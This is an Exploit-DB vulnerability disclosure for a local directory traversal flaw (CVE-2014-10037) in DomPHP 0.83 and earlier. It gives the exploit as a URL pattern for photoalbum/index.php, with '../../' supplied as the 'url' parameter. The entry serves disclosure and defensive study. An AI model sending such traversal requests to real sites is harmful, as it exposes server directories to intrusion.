DomPHP <= 0.83 - Local Directory Traversal Vulnerability

2014-01-12T00:00:00
ID EDB-ID:30865
Type exploitdb
Reporter Houssamix
Modified 2014-01-12T00:00:00

Description

DomPHP <= 0.83 - Local Directory Traversal Vulnerability. CVE-2014-10037. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------
DomPHP &lt;= v0.83 Local Directory Traversal Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix                       
= Script : DomPHP &lt;= v0.83
                    
= Download : http://www.domphp.com/download/  
            
= BUG :  Local Directory Traversal Vulnerability 
 
= Exploit :                               
http://[target]/photoalbum/index.php?urlancien=&url=[Directory]
                 
Exemple : 				 
http://target.com/photoalbum/index.php?urlancien=&url=../../